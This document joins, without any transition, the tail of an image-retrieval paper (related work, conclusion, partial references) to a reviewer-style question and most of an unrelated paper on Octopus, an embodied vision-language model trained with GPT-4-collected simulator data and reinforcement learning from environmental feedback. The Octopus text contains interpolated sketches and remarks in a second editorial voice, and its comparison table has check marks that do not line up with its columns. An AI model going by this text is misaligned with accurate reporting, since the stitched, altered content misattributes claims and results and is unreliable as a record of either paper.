**Image retrieval.** Traditionally, hand-crafted features were heuristically designed to describe the image content based on its color (Wengert et al., 2011; Wang & Hua, 2011), texture (Park et al., 2002), or shape (Cao et al., 2011). Typical features include GIST (Siagian & Itti, 2007), SIFT (Lowe, 1999), SURF (Bay et al., 2006), VLAD (Jégou et al., 2010), and so on. Recent years have witnessed explosive research on deep-learning-based features trained over labeled images. Besides the evolution of network architecture designs (Krizhevsky et al., 2017; He et al., 2016; Vaswani et al., 2017), numerous efforts (Wieczorek et al., 2020; El-Nouby et al., 2021) have been dedicated to various loss functions, including classification loss (Zhai & Wu, 2018; Zhou et al., 2019), triplet loss (Yuan et al., 2020), contrastive loss (Jun et al., 2019; El-Nouby et al., 2021), and center loss (Wieczorek et al., 2020). The similarity between features can be calculated through some distance measure or evaluated through re-ranking techniques (Revaud et al., 2019). Another line of research centers on approximate nearest neighbor search to speed up the search process, accepting a certain level of compromise in search accuracy.
One way is to enable fast distance computation through hashing and quantization techniques such as LSH (Indyk & Motwani, 1998), min-Hash (Chum et al., 2008), ITQ (Gong et al., 2012), PQ (Jegou et al., 2010), and many others (Ge et al., 2013; Wang & Zhang, 2018; Zhu et al., 2016). The other way is to reduce the number of distance comparisons by retrieving a small number of candidates. Typical methods include partition-based indexing (Babenko & Lempitsky, 2014b; Xia et al., 2013), which partitions the feature space into non-overlapping clusters, and graph-based indexing (Jayaram Subramanya et al., 2019), which builds a neighborhood graph with edges connecting similar images. To improve the recall rate while ensuring fast search speed, a hierarchical coarse-to-fine strategy (Malkov & Yashunin, 2018) has been the popular choice, in which retrieved candidates are refined level by level. Additionally, a number of excellent works have introduced hybrid indexing (Chen et al., 2021), which improves search by leveraging the best of both indexing schemes while avoiding their limitations.

**Generative modeling.** Deep autoregressive networks are generative sequential models that assume a product rule for factoring the joint likelihood and model each conditional distribution through a neural network. AR models have shown extremely powerful progress in generative tasks across multiple domains such as images (Chen et al., 2020; Yu et al., 2022b), text (Radford et al., 2019; Yang et al., 2019), audio (Dhariwal et al., 2020; Chung et al., 2019), and video (Wu et al., 2022; Weissenborn et al., 2019). A key component is linearizing data into a sequence of symbols, with notable works such as VQ-VAE (Van Den Oord et al., 2017) and RQ-VAE (Lee et al., 2022a). Recently, a number of works (Tay et al., 2022; Wang et al., 2022b; De Cao et al., 2020) further explored the idea of using AR models to empower entity retrieval and document retrieval. Most related to our work are NCI (Wang et al., 2022b) and DSI (Tay et al., 2022), which are concerned with document retrieval. However, these approaches utilize hierarchical k-means clustering applied to document embeddings derived from a small pretrained language model to obtain document identifiers. In contrast, we put forward a novel approach that learns the identifier directly from semantic supervision, and we showcase its effectiveness in the context of image retrieval. We posit that this discovery can also be advantageous for document retrieval tasks.

**5 Conclusion**

In this paper, we delve into the realm of generative modeling to enhance end-to-end image retrieval, a process that directly connects a query image to its closest match. With the introduction of our semantic image tokenizer, we have demonstrated that our model achieves remarkable precision without compromising recall. Through extensive ablation studies and evaluations on large-scale datasets, we have underscored the superior performance of our approach. We believe that this approach to generative modeling in image retrieval not only pushes the boundaries of the field but also holds potential for broader applications.

**Limitations.** While our model has shown significant performance improvements, it is important to acknowledge its limitations, which can serve as avenues for future research. Although our model has demonstrated scalability to million-scale datasets, dealing with billion-scale datasets is a complex challenge.
It may necessitate even larger models with higher capacity, potentially impacting inference speed. Striking a balance between model capacity and speed is an area that warrants exploration for efficient and effective billion-scale search. Training large autoregressive models requires substantial computational resources, which raises environmental concerns. Research efforts to enable efficient training, such as fast fine-tuning of pretrained models, are crucial to mitigate energy consumption and environmental impact. REFERENCES Daniel Adiwardana, Minh-Thang Luong, David R So, Jamie Hall, Noah Fiedel, Romal Thoppilan, Zi Yang, Apoorv Kulshreshtha, Gaurav Nemade, Yifeng Lu, et al. Towards a human-like open-domain chatbot. *arXiv preprint arXiv:2001.09977*, 2020. Jean-Baptiste Alayrac, Jeff Donahue, Pauline Luc, Antoine Miech, Iain Barr, Yana Hasson, Karel Lenc, Arthur Mensch, Katie Millican, Malcolm Reynolds, et al. Flamingo: a visual language model for few-shot learning. *arXiv preprint arXiv:2204.14198*, 2022. Ahmad Alzu’bi, Abbes Amira, and Naeem Ramzan. Semantic content-based image retrieval: A comprehensive study. *Journal of Visual Communication and Image Representation*, 32:20–54, 2015. Alexandr Andoni and Piotr Indyk. Near-optimal hashing algorithms for approximate nearest neighbor in high dimensions. *Communications of the ACM*, 51(1):117–122, 2008. Artem Babenko and Victor Lempitsky. Additive quantization for extreme vector compression. In *Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition*, pp. 931–938, 2014a. Artem Babenko and Victor Lempitsky. The inverted multi-index. *IEEE transactions on pattern analysis and machine intelligence*, 37(6):1247–1260, 2014b. Song Bai, Peng Tang, Philip HS Torr, and Longin Jan Latecki. Re-ranking via metric fusion for object retrieval and person re-identification. In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition*, pp. 740–749, 2019. Herbert Bay, Tinne Tuytelaars, and Luc Van Gool. Surf: Speeded up robust features. In *European conference on computer vision*, pp. 404–417. Springer, 2006. Yoshua Bengio, Nicholas Léonard, and Aaron Courville. Estimating or propagating gradients through stochastic neurons for conditional computation. *arXiv preprint arXiv:1308.3432*, 2013. Jon Louis Bentley. K-d trees for semidynamic point sets. In *Proceedings of the sixth annual symposium on Computational geometry*, pp. 187–197, 1990. Michele Bevilacqua, Giuseppe Ottaviano, Patrick Lewis, Wen-tau Yih, Sebastian Riedel, and Fabio Petroni. Autoregressive search engines: Generating substrings as document identifiers. *arXiv preprint arXiv:2204.10628*, 2022. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020. Bingyi Cao, Andre Araujo, and Jack Sim. Unifying deep local and global features for image search. In *Computer Vision–ECCV 2020: 16th European Conference, Glasgow, UK, August 23–28, 2020, Proceedings, Part XX 16*, pp. 726–743. Springer, 2020. Yang Cao, Changhu Wang, Liqing Zhang, and Lei Zhang. Edgel index for large-scale sketch-based image search. In *CVPR 2011*, pp. 761–768. IEEE, 2011. Yue Cao, Mingsheng Long, Jianmin Wang, and Shichen Liu. Collective deep quantization for efficient cross-modal retrieval. 
In *Proceedings of the AAAI Conference on Artificial Intelligence*, volume 31, 2017. Mark Chen, Alec Radford, Rewon Child, Jeffrey Wu, Heewoo Jun, David Luan, and Ilya Sutskever. Generative pretraining from pixels. In *International conference on machine learning*, pp. 1691–1703. PMLR, 2020. Qi Chen, Bing Zhao, Haidong Wang, Mingqin Li, Chuanjie Liu, Zengzhong Li, Mao Yang, and Jingdong Wang. Spann: Highly-efficient billion-scale approximate nearest neighborhood search. *Advances in Neural Information Processing Systems*, 34:5199–5212, 2021.
VUA9LSmC2r
- When using GPT-4 plus a simulator to collect the dataset, is the location of the target object directly obtained from the simulator? And is this information stored and used for later training? With this approach, the final complete robotic system still needs a separate vision model besides the ViT-L in the VLM. Can the authors discuss this design choice?
LEARNING EMBODIED VISION-LANGUAGE PROGRAMMING FROM INSTRUCTION, EXPLORATION, AND ENVIRONMENTAL FEEDBACK

Anonymous authors Paper under double-blind review

Figure 1: Illustration of the functionality of our vision-language programmer, Octopus, in the developed OctoGTA environment. Given a task in the form of natural language, Octopus relies on its egocentric vision to generate plans and the corresponding executable code.

ABSTRACT

Large vision-language models (VLMs) have achieved substantial progress in multimodal perception and reasoning. Furthermore, when seamlessly integrated into an embodied agent, they signify a crucial stride towards the creation of autonomous and context-aware systems capable of formulating plans and executing commands with precision. In this paper, we introduce Octopus, an embodied VLM designed to 1) proficiently decipher an agent's visual and textual task objectives, 2) formulate intricate action sequences, and 3) generate executable code. Our design allows the agent to adeptly handle a wide spectrum of tasks, ranging from mundane daily chores in simulators to sophisticated interactions in complex video games. Octopus is trained by leveraging GPT-4 to control an explorative agent that generates training data, i.e., action blueprints and the corresponding executable code, within our experimental environment called OctoVerse. We also collect feedback that enables an enhanced training scheme, Reinforcement Learning with Environmental Feedback (RLEF). Through a series of experiments, we illuminate Octopus's functionality and present compelling results, and the proposed RLEF turns out to refine the agent's decision-making. By open-sourcing our model architecture, simulator, and dataset, we aspire to ignite further innovation and foster collaborative applications within the broader embodied AI community.

1 INTRODUCTION

With the rise of large language models (LLMs) (Radford et al., 2019; Brown et al., 2020; Ouyang et al., 2022; Touvron et al., 2023; Chiang et al., 2023), a subsequent surge in vision-language models (VLMs) emerged (Alayrac et al., 2022; Awadalla et al., 2023; Li et al., 2023d;b). This evolution has expanded machine capabilities, enabling tasks such as accurate image- or video-based description (Li et al., 2023d), reasoning (Xie et al., 2023; Chen et al., 2023), and conversation (Dai et al., 2023; Li et al., 2023b). In the realm of embodied AI, notable efforts like SayCan (Ahn et al., 2022), PaLM-E (Driess et al., 2023), and RT-2 (Brohan et al., 2023) have trained on robot manipulation data, so that agents process visual input and relay precise robotic motor control commands.

Parallel to this robot manipulation approach, another methodology for interacting with the environment focuses on task execution through code invocations. This paradigm mirrors our inherent human System-I stimuli, characterized by instinctive actions akin to predefined code. Conversely, the more contemplative System-II processes, which involve planning and reasoning, may be better suited for large models. For example, referring to Figure 1, planning a car ride with a pet might entail a subconscious checklist: `getOutOf()` the house, `check()` for the pet outside, `approach()` the pet, `letFollow()`, and then `open()` to `moveIn()` to the car.
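To make this concrete, the checklist above can be written directly as code against a hypothetical environment API exposing those helpers; the `StubEnv` class below is ours, added only so the sketch runs standalone.

```python
class StubEnv:
    """Minimal stand-in for a simulator API so the sketch runs as-is."""
    def __getattr__(self, name):
        def action(*args):
            print(f"{name}({', '.join(map(repr, args))})")
            return args[0] if args else None
        return action

def bring_pet_to_car(env):
    """The Figure 1 checklist, expressed as executable code."""
    env.getOutOf("house")     # leave the house
    pet = env.check("pet")    # look for the pet outside
    env.approach(pet)         # walk over to it
    env.letFollow(pet)        # have it follow the agent
    env.open("car")           # open the car
    env.moveIn("car")         # get in, with the pet following

bring_pet_to_car(StubEnv())
```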
In fact, such a "programmatic" paradigm has been, although not in vision, leveraged by pioneering works such as ToolFormer (Schick et al., 2023), HuggingGPT (Shen et al., 2023), ViperGPT (Surís et al., 2023), and VisProg (Gupta & Kembhavi, 2023). They harness LLMs to craft programs and trigger relevant APIs. Game-centric models like Voyager (Wang et al., 2023) and Smallville (Park et al., 2023) have similarly employed GPT for function calls within game engines, though they often parse data directly from their environments. However, similar programming paradigms remain unexplored when visual perception is incorporated. Primary initiatives like TAPA (Wu et al., 2023) and SayPlan (Rana et al., 2023) can only output plans; they anchor their strategies in initial environmental states or employ dynamic scene graphs as LLM inputs, respectively. Despite their innovations, the seamless conversion of detailed plans into real-world actions is still missing. Another significant challenge is the over-reliance on pre-trained vision models to convert visual content into language, which can occasionally hinder the LLM's performance. While EmbodiedGPT (Mu et al., 2023) addresses the problem by integrating vision-language modeling for planning and then transitioning to manipulation using policy mapping, the capability of embodied vision-language models to devise executable programs is still largely uncharted territory. This gap inspired our exploration.

In this paper, we introduce Octopus, a novel embodied vision-language programmer. Figure 1 illustrates how this model integrates an agent's visual perspective with textual task objectives to devise precise action sequences and yield executable code. To empower Octopus with its vision-centric programming capabilities, we leveraged GPT-4 to collect training data within our experimental realm, the OctoVerse. Here, GPT-4 was provided with intricate system messages, extensive environmental cues, and clearly defined objectives. Based on this input, GPT-4 formulated crucial action strategies and their associated code. Meanwhile, the agent operating in the OctoVerse captured its visual perspectives. Using the collected data, Octopus stands out in generating code that seamlessly melds vision, language instruction, and action code.

During the data collection phase, the agent, guided by GPT-4, concurrently receives feedback from simulators about the efficacy of each executed code step, discerning successful moves from unsuccessful ones. This led us to incorporate the Reinforcement Learning with Environmental Feedback (RLEF) approach into our pipeline. Successful steps earn rewards, which are then used to train a reward model. Leveraging these insights, we further fine-tune Octopus using Proximal Policy Optimization (PPO) (Schulman et al., 2017). This approach serves as a navigational beacon, sharpening the model's decision-making accuracy.

Empirically, the proposed Octopus model showcases its adaptability and prowess in numerous testing scenarios, yielding promising results not only on routine tasks but also on those that require reasoning capabilities. When pitted against existing models, Octopus emerges superior in task planning, code generation, and task execution, with its performance notably enhanced after the RLEF integration. In sum, our key contributions include:

Table 1: Overview of Related Embodied AI Models. The proposed Octopus distinguishes itself from other models as a unified vision-language model for both plan and code generation.
| Models | Release Date | Supported Environment | Vision Model | Code Generator | Action w/ Feedback | LLM Training Enabled |
|-----------------|--------------|-----------------------|--------------|----------------|--------------------|----------------------|
| Text2Motion | Mar. 2023 | Sim | ✓ | ✓ | ✓ | |
| Instruct2Act | May 2023 | Sim | ✓ | ✓ | | |
| Lang2Rewards | Jun. 2023 | Sim | ✓ | ✓ | ✓ | |
| VoxPoser | Jul. 2023 | Sim | ✓ | ✓ | | |
| SayCan | Apr. 2022 | Real | ✓ | ✓ | | |
| PaLM-E | Mar. 2023 | Sim, Real | ✓ | ✓ | ✓ | |
| RT-2 | Jul. 2023 | Real | ✓ | ✓ | ✓ | |
| SayPlan | Jun. 2023 | Real | ✓ | ✓ | ✓ | |
| EmbodiedGPT | May 2023 | Sim | ✓ | ✓ | ✓ | |
| TaPA | Jul. 2023 | Sim | ✓ | ✓ | ✓ | |
| Voyager | May 2023 | Game | ✓ | ✓ | ✓ | |
| Octopus | Oct. 2023 | Sim, Game | ✓ | ✓ | ✓ | |

• A novel embodied vision-language planner and programmer trained with Reinforcement Learning with Environmental Feedback (RLEF).
• Two diverse and realistic embodied environments within the OctoVerse framework: (i) OctoGibson, which is developed upon OmniGibson (Li et al., 2023c), and (ii) OctoGTA, which is adapted from GTA-V (gta, 2014). Based on these platforms, we carefully design tasks and programming function libraries for Octopus.
• Compelling results demonstrating the effectiveness of the integrated RLEF approach in Octopus and useful insights facilitating future research on visual planning and programming.

2 RELATED WORK

2.1 EMBODIED AI WITH LARGE MODELS

The recent wave of research focuses on merging LLMs with embodied AI tasks (Radford et al., 2019; Brown et al., 2020; Ouyang et al., 2022; Touvron et al., 2023). For instance, VoxPoser addresses robotic manipulation problems through unsupervised methods (Huang et al., 2023b). A group of projects, namely SayCan (Ahn et al., 2022), PaLM-E (Driess et al., 2023), RT-2 (Brohan et al., 2023), and EmbodiedGPT (Mu et al., 2023), effectively integrate visual or linguistic cues with robot manipulation data. Outside the domain of robotic manipulation, initiatives like Voyager (Wang et al., 2023) and Smallville (Park et al., 2023) harness the capabilities of GPT to interface with game functions, relying on preset functions to manage intricate manipulations. In a parallel vein, VisProg (Gupta & Kembhavi, 2023) leverages GPT-3 language prompts to craft Python programs, opening the door to a multitude of fascinating applications. While the proposed Octopus model also formulates plans and code, its distinguishing feature is the seamless integration of visual input in program and code generation. This also stands in contrast to other embodied planners like TAPA (Wu et al., 2023) and SayPlan (Rana et al., 2023), which deploy separate vision modules to translate visual data into linguistic inputs for LLMs. Octopus excels as a cohesive vision-language model, delivering not just plans but also executable code.

2.2 VISION-LANGUAGE MODELS

Recent advances in large language models (LLMs) like GPTs (Radford et al., 2019; Brown et al., 2020; Ouyang et al., 2022), LLaMA (Touvron et al., 2023), and Vicuna (Chiang et al., 2023) have bolstered the performance of vision-language models, such as Flamingo (Alayrac et al., 2022; Awadalla et al., 2023) and BLIP-2 (Li et al., 2023d), particularly in zero-shot learning scenarios. To advance the conversation and interaction capabilities of vision-language models, researchers have begun exploring more advanced designs.
These include Otter (Li et al., 2023b), InstructBLIP (Dai et al., 2023), and LLaVA (Liu et al., 2023), among other noteworthy contributions (Ye et al., 2023; Zhou et al., 2022a; Li et al., 2023a). These models are specifically designed to facilitate complex human-model interactions and are particularly well-suited for use in multi-modal chatbots. Extending Otter (Li et al., 2023b), we propose Octopus, a vision-language programming model designed to facilitate human-model-agent interaction. Specifically, Octopus processes human instructions to generate action codes, enabling agents to execute operations accordingly.

2.3 Feedback in Large Language Models

Reinforcement Learning with Human Feedback (RLHF) (Ouyang et al., 2022; Stiennon et al., 2020; Ziegler et al., 2019) is a modern approach in the field of AI that combines traditional reinforcement learning with feedback from human supervisors. Sun et al. (2023) is the first successful adaptation of RLHF to vision-language alignment. In our research, we propose Reinforcement Learning with Environmental Feedback (RLEF), which harnesses the power of environmental feedback to train an embodied vision-language model. Instead of direct human supervision, the feedback in RLEF comes naturally from the simulator environment.

3 The OctoVerse Environment and Data Collection

In this section, we present the simulator environments designed to train and assess the Octopus model. We then delve into our data collection techniques utilized within these environments and explain the details of the training and test data.

3.1 Overview of OctoVerse

To train our Octopus model, we developed two simulator environments under the unified name of OctoVerse. Our primary environment is the OctoGibson simulator, from which we collect the training data and conduct our primary analysis. We then assess the model's generalization capabilities in the OctoGTA simulator.

OctoGibson We built the environment on the foundation of an existing simulation framework, OmniGibson (Li et al., 2023c), which supports 1,000 daily activities across 50 scenes, featuring over 5,000 meticulously annotated objects. To bolster model training, we incorporated 16 functions that the robot can execute, such as `walkTo()`. Within this environment, we meticulously crafted 476 tasks\(^1\). Each task begins with an initial state and concludes with a definitive termination state, allowing for a straightforward assessment of task completion. Among them, 367 tasks are routine tasks: simple and direct actions like "place a glass in a trash can". Conversely, the remaining 109 are reasoning tasks which necessitate deeper comprehension. An example is "buy a chocolate", where the agent needs to know to pick a chocolate bar from the shelf and then place it, along with money, on the checkout counter. To acquaint readers with our environment, Figure 2 (a-c) illustrates the task taxonomy and provides a word cloud.

OctoGTA Our secondary environment, built on the foundation of GTA-V (gta, 2014), serves the purpose of auxiliary experiments, assessing the Octopus model's generalizability. Within this setting,

---

\(^1\)The full list of task names and their categories are listed in this google sheet.

Figure 3: Data Collection Example for "Cook a Bacon" Task. GPT-4 perceives the environment through the environmental message and produces anticipated plans and code in accordance with the detailed system message.
This code is subsequently executed in the simulator, directing the agent to the subsequent state. For each state, we gather the environmental message, wherein observed objects and relations are substituted by egocentric images to serve as the training input. The response from GPT-4 acts as the training output. Environmental feedback, specifically the determination of whether each target state is met, is documented for RLEF training.

Apart from the example in Figure 1, another example of such a task is "help NPC to drive their boat back to shore".

3.2 INSTRUCTIONS FROM EXPLORATION

Initiating the training of the Octopus model involves ensuring its operational capability, particularly its ability to process vision input, interpret current and past states (such as objects the agent is holding), and produce structured plans and executable code. Thus, the primary task in organizing training data is to form a succinct pairing: "vision input + current/historical states → next-step plan + executable code". However, collecting these pairs is far from simple; manually pairing them through human programmers would be both time-intensive and laborious. To circumvent this challenge, we harness the capabilities of GPT-4, not only to guide the agent's actions for task attempts but also to facilitate the automated data-gathering process.

Environment Info Collection As delineated in Figure 3 and Figure 4 (a), we harvest an environment message for each state, encompassing attributes like Observed Objects, Observed Relations, Inventory, and more. Specifically, the simulator can provide us with an exact scene graph at each state, shaping the content of the first two parts. The inventory info can be easily obtained in the simulator. The task, e.g., "cooking bacon" in Figure 3, is represented by the Task Goal.

Automation with GPT-4 Having prepared the environment message, we next crafted a structured system message to ensure that the robot not only understands its input but also maintains a consistent output format. A detailed examination of this prompt can be found in the appendix. Experiments have shown that a well-articulated prompt allows GPT-4 to effectively generate executable code. It is worth noting that the combined length of the system and environment messages can be extremely long. As a result, standard GPT-4 8K models may struggle to produce meaningful outputs, necessitating the use of the more robust GPT-4 32K model. As illustrated in Figure 3, when GPT-4 is fed consistent system and environment messages, it yields comprehensive outputs, encompassing current scenario analysis, planning, and actionable code. These data support the training described in Section 4.2.

**Error Management** Notably, GPT-4 collects training data under the main task of guiding the agent to complete tasks. However, GPT-4 is not infallible. Errors can manifest in multiple ways, ranging from syntax errors to physical challenges in the simulator. For instance, as depicted in Figure 3, between states #5 and #6, the action failed because of the long distance between the agent (holding the bacon) and the pan. Such setbacks reset the task to its previous state. If a task remains incomplete after 10 steps, it is deemed unsuccessful, and we terminate it due to budget concerns. All data pairs, regardless of the task's completion status, are valuable resources for refining instructions.

---

We meticulously design tasks to be friendly, ensuring they exclude any inappropriate or violent behaviors.
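As an illustration of the environment message described above, its structure might look as follows. The field names follow Section 3.2, while the concrete objects and relations are invented for the "cook a bacon" example.

```python
# Hypothetical environment message for the "cook a bacon" task (Figure 3).
# Field names follow Section 3.2; concrete values are illustrative only.
environment_message = {
    "observed_objects": ["bacon_0", "pan_1", "stove_2", "fridge_3"],
    "observed_relations": [
        ("bacon_0", "inside", "fridge_3"),
        ("pan_1", "ontop", "stove_2"),
    ],
    "inventory": [],              # the agent is not holding anything yet
    "task_goal": "cook a bacon",
}
```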
### 3.3 ENVIRONMENTAL FEEDBACK

While GPT-4 guides the agent toward task completion, its continual trial-and-error approach does more than just collect vision-output pairs. This iterative problem-solving provides a rich set of feedback data. The automatic annotation of the feedback is twofold, focusing on both step-level and task-level judgments. **Step-level judgment** assesses the alignment of post-execution states with their target states. For instance, in Figure 3, steps color-coded in green signify positive feedback. One can visualize the action sequence for task completion as a tree, where each node indicates a step (subtask), encapsulating an action code. Accompanying each step is a binary value that denotes success or failure, giving preference to the successful branch over its counterpart. **Task-level judgment**, on the other hand, gauges the successful execution of the overall task. If the task is not completed as intended, every state within that task is labeled as negative. This collated feedback data serves as a foundation for our Reinforcement Learning with Environmental Feedback (RLEF) methodology, which we discuss in greater detail in Section 4.3.

### 4 OCTOPUS: THE EMBODIED VISION-LANGUAGE PROGRAMMER

In this section, we delineate the architecture and training methodologies underpinning Octopus, our novel vision-language programmer. Building upon the foundational principles of Otter (Li et al., 2023b), Octopus incorporates specialized modules to cater to the vision-language programming tasks within OctoVerse. We will elucidate the architectural design derived from the Otter model, detail the supervised fine-tuning approach that harnesses instructions from exploration, and explore the integration of reinforcement learning enhanced by environmental feedback. We refer to Figure 4 (b), which briefly illustrates the Octopus training pipeline.

#### 4.1 ARCHITECTURE

The Octopus architecture is heavily inspired by the foundation laid by the Otter model (Li et al., 2023b). However, in our adaptation, specialized modifications have been made to tailor the architecture to the unique challenges of vision-language programming tasks found in OctoVerse. At the core of Octopus is the seamless integration of two critical components: the **MPT-7B Language Decoder** (MosaicML, 2023) and the **CLIP ViT-L/14 Vision Encoder** (Radford et al., 2021).

To further enhance the synergy between the vision and language components, we have incorporated design principles from the Flamingo architecture (Alayrac et al., 2022). This is evident in our employment of the **Perceiver Resampler module** and the intricate weaving of **Cross-Gated Attention modules**. Initially, the Perceiver Resampler module ingests a sequence of image or video features to produce a fixed set of visual tokens. Subsequently, these tokens condition the language layers through Cross-Gated Attention modules, where the tokens act as keys and values while text from preceding layers serves as queries. Through this detailed architecture, Octopus is primed to excel in tasks that demand a nuanced understanding of both visual and textual data.

4.2 Supervised Finetuning with Instructions From Exploration

We train the Octopus model on our collected dataset from OctoVerse \( D_E = \{(X_v, T_i, T_r)\} \) with token-level supervised fine-tuning (SFT) (Ouyang et al., 2022; Touvron et al., 2023). During training, the Perceiver Resampler transforms images \( X_v \) into visual tokens that are aligned with the text modality in the language model layers.
These visual tokens condition subsequent layers via Cross-Gated Attention modules. The training objective is next-token prediction, akin to GPT-series models (Brown et al., 2020; OpenAI, 2023), here with the incorporation of visual and textual inputs. The likelihood of a targeted response \( T_r \) is modeled as:

\[ p(T_r | T_i, X_v) = \prod_{l=1}^{L} p(t_l | X_v, T_i, T_{r,<l}). \]

Note that \( T_i \) denotes the instruction tokens and \( T_{r,<l} \) denotes the response tokens before the currently predicted token \( t_l \). During inference, tokens are converted into natural language via the language decoder's text tokenizer.

In OctoVerse, visual observations are represented by \( X_v = \{x^0_F, \ldots, x^7_F, x^0_B, x^1_B\} \), consisting of eight first-person view (FPV) images followed by two bird's-eye view (BEV) images. During training, this multi-image input \( X_v \) is treated as a continuous video frame sequence. The rationale behind capturing both FPV and BEV is twofold. Firstly, by capturing the FPV, we aim for the agent to mimic human-like processing, assimilating images it directly observes, much like how humans interpret their immediate surroundings. Secondly, the BEV is integrated because agents, unlike humans, can tap into alternative camera sources, such as surveillance cameras, granting a more holistic understanding of the environment. To obtain the eight FPV images, we capture one image every 45 degrees, ensuring a complete 360-degree perspective of the environment.

4.3 Reinforcement Learning with Environmental Feedback (RLEF)

Within the OctoVerse ecosystem, as explained in Section 3.3 and Figure 3, we visualize task progression as a tree. Each node on this tree symbolizes a sub-task, and it carries a binary value, either \( \{0, 1\} \), to denote whether the sub-task was successful. Simply put, if a node (or sub-task) has a value of 1, it is a step in the right direction toward our end goal.

**Tree-based Task Representation** We organize these data into environmental reward datasets \( D_R = \{(X_v^*, T_i^*, T_{r,1}^*, T_{r,2}^*, c)\} \), where \( T_{r,1}^* \) and \( T_{r,2}^* \) are two responses on the tree that share the same parental node with task description \( T_i^* \), and \( c \) is the index of the preferred response that could lead to final completion of the given task. The primary purpose of this step is to ensure that, when faced with two sub-tasks stemming from the same parent task, the reward mechanism favors the branch that is successfully executed. Note that even if a parental node does not have multiple responses, we can still assign feedback according to Section 3.3.

**Reward Model Configuration** We finetune a single-modal CodeLLaMA-7B model on \( D_R \) with an additional value head as our reward model \( r_\phi \). For computational efficiency, the reward model accepts only the textual modality and outputs a scalar reward. The function of this text-based reward model is to assess state transitions, denoted by \( T_i^* \rightarrow T_{r,j}^* \), to determine which transitions yield higher rewards and thereby assist the agent in task execution and completion.
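The paper does not spell out the reward model's training loss; a standard choice for such preference data (cf. Ouyang et al., 2022) is a pairwise Bradley-Terry objective over the preferred vs. non-preferred transition. A minimal PyTorch sketch under that assumption:

```python
import torch
import torch.nn.functional as F

def reward_pair_loss(r_preferred: torch.Tensor, r_other: torch.Tensor) -> torch.Tensor:
    """Bradley-Terry style loss: push the scalar reward of the preferred
    transition above that of its non-preferred sibling."""
    return -F.logsigmoid(r_preferred - r_other).mean()

# In practice, the rewards would come from the CodeLLaMA value head applied
# to the two textual transitions T_i* -> T_{r,j}*; random tensors stand in here.
r_pref = torch.randn(8, requires_grad=True)
r_other = torch.randn(8)
loss = reward_pair_loss(r_pref, r_other)
loss.backward()
print(float(loss))
```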
**Policy Model Development** Next, we employ the above supervised fine-tuned model as the initial policy model (Ouyang et al., 2022) \( \pi_{\text{INIT}}^\theta \) with fixed parameters. We then initialize a duplicate of the model as the RL-tuned model \( \pi_{\text{RL}}^\theta \) and train it with Proximal Policy Optimization (PPO) (Schulman et al., 2017) to maximize response rewards. The loss function is formulated as:

\[ L(\pi_{\text{RL}}^\theta) = -\mathbb{E}_{(X_v^*, T_i^*) \sim D_R,\, T_r \sim \pi_{\text{RL}}} \left[ r_\phi(T_i^*, T_r) - \beta \cdot D_{KL}\!\left(\pi_{\text{RL}}(X_v^*, T_i^*) \,\|\, \pi_{\text{INIT}}(X_v^*, T_i^*)\right) \right], \]

where \( \beta \) acts as a hyper-parameter regulating the magnitude of the Kullback–Leibler (KL) penalty.

### 5 EXPERIMENTS

**Experimental Setup** We first set up OctoGibson to evaluate the performance of Octopus and other related models. Specifically, we use two metrics: the goal-task completion score, which checks whether the task is actually completed in the simulator, and the plan score from human evaluation. In total, we have 60 evaluation tasks, with 45 from environments seen during training and 15 from unseen environments; 45 are routine tasks and 15 require reasoning. Please note that models like Octopus might not always accurately identify specific object names as they appear in the simulator (e.g., "water_bottle_189"). To address this, we implement a post-processing step for the generated code, substituting generic object references with their exact names from the simulator via simple string similarity matching.
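This post-processing step could be implemented with, e.g., Python's standard difflib; the sketch below is one plausible realization, since the paper does not specify its exact matcher.

```python
import difflib

def ground_object_names(code: str, simulator_objects: list[str]) -> str:
    """Replace generic object references in generated code with the closest
    exact simulator name, using simple string similarity."""
    tokens = set(code.replace("(", " ").replace(")", " ").replace('"', " ").split())
    for token in tokens:
        match = difflib.get_close_matches(token, simulator_objects, n=1, cutoff=0.6)
        if match and match[0] != token:
            code = code.replace(token, match[0])
    return code

print(ground_object_names('walkTo("water_bottle")',
                          ["water_bottle_189", "cabinet_12"]))
# -> walkTo("water_bottle_189")
```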
Table 2: **Main Results on OctoGibson.** We compare various models: standalone language models, adapted vision-language planners, and our Octopus models, across different evaluation settings. In cells displaying two values, the first represents the task completion rate across the target validation task sets, while the second assesses the conceptual accuracy of the model's planning as judged by human evaluators. GT denotes that the model input is directly parsed from the simulator, with information on objects (O) or relations (R). The five rightmost columns subdivide the entire goal-task set. Octopus shows consistently better results on task completion.

| Model | Vision Model | Language Model | Seen Env | Unseen Env | Follow | Reason | All |
|------------------------|--------------|----------------|-------------|-------------|-------------|-------------|-------------|
| LLaMA | GT (O+R) | LLaMA2-7B | 0.07 / 0.11 | 0.13 / 0.13 | 0.11 / 0.16 | 0.00 / 0.00 | 0.08 / 0.12 |
| CodeLLaMA | GT (O+R) | CodeLLaMA-7B | 0.09 / 0.20 | 0.20 / 0.40 | 0.16 / 0.31 | 0.00 / 0.07 | 0.12 / 0.25 |
| TAPA (task-level) | OVD GT (O) | CodeLLaMA-7B | 0.09 / 0.36 | 0.13 / 0.33 | 0.11 / 0.36 | 0.06 / 0.33 | 0.10 / 0.35 |
| TAPA (step-level) | OVD GT (O) | CodeLLaMA-7B | **0.16** / **0.42** | 0.13 / 0.27 | **0.18** / **0.38** | 0.07 / 0.40 | 0.15 / 0.38 |
| EmbodiedGPT | CLIP-ViT | MPT-7B | 0.04 / 0.36 | 0.27 / 0.53 | 0.13 / 0.38 | 0.00 / 0.40 | 0.10 / 0.40 |
| Octopus (SFT Only) | CLIP-ViT | MPT-7B | 0.11 / 0.33 | 0.27 / 0.47 | 0.16 / 0.38 | 0.13 / 0.33 | 0.15 / 0.37 |
| Octopus (SFT + RLEF) | CLIP-ViT | MPT-7B | 0.13 / 0.38 | **0.33** / **0.53** | **0.18** / **0.40** | **0.20** / **0.53** | **0.18** / **0.42** |

### 5.1 MAIN RESULTS

